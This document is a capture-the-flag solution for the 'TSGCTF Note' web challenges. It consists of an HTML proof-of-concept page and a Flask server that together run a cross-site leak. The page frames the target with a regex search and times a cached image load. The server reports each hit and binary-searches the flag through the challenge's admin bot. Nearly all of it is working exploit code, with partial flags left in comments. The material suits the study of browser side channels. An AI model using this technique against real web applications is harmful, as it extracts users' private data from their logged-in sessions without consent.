TSGCTF Note (both 1 and 2)

poc.html

<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>

<iframe name=f width=100 height=100></iframe>

<script>
const prefix = '__PREFIX__'
const chars = '__CHARS__'

const re = `${prefix}[${chars}]`

const url = `http://34.84.10.25:18365/?${re}`;
// const url = `http://34.84.161.130:18364/?${re}`;

f.location = url;

const check = async () => {
  await fetch('https://www.materialui.co/materialIcons/navigation/close_black_72x72.png', {
    mode: "no-cors",
  })
  fetch(`//${document.location.host}/hit/${prefix}/${chars}`)
};

setTimeout(check, 400);

</script>
</body>
</html>

server.py

from flask import Flask
import requests
import time


app = Flask(__name__)

baseurl = 'http://[your_server]'

CHARS = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_'

@app.route('/payload/<string:prefix>/<string:chars>')
def handle_search(prefix, chars):
    return open('poc.html').read().replace('__PREFIX__', prefix).replace('__CHARS__', chars)

@app.route('/hit/<string:prefix>/<string:chars>')
def handle_hit(prefix, chars):
    l = len(chars)
    if l == 1:
        l = len(CHARS)
        chars1, chars2 = CHARS[:l//2], CHARS[l//2:]
        query(f'/payload/{prefix+chars[0]}/{chars1}')
        time.sleep(1)
        query(f'/payload/{prefix+chars[0]}/{chars2}')
    else:
        chars1, chars2 = chars[:l//2], chars[l//2:]
        query(f'/payload/{prefix}/{chars1}')
        time.sleep(1)
        query(f'/payload/{prefix}/{chars2}')
    return 'ok'


def query(q):
    print(q)
    print(requests.post('http://34.84.10.25:18365/query', data={'url': f'{baseurl}{q}'}).content)
    # print(requests.post('http://34.84.161.130:18364/query', data={'url': f'{baseurl}{q}'}).content)


if __name__ == '__main__':
    # prefix = 'TSGCTF.5JFJMWOPOPW5E79' # note 2
    # prefix = 'TSGCTF.5H4LL_W3_ENCRYP7' # note 1
    prefix = 'TSGCTF.'
    chars = CHARS
    query(f'/payload/{prefix}/{chars}')
    app.run()